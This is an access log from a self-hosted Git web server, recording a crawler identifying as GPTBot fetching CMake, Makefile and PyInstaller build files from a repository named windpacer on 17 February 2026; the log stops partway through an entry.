"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9887] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:15:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16923] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:15:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 9880] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:15:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 78610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:15:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 9879] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:15:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 53389] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:15:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:15:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10774] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:15:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21644] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:15:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10375] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:15:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:15:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 40461] [Gzip 14.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:15:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51201] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11823] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11267] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29808] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10931] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11094] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10069] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16045] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12008] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21829] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11019] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9945] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 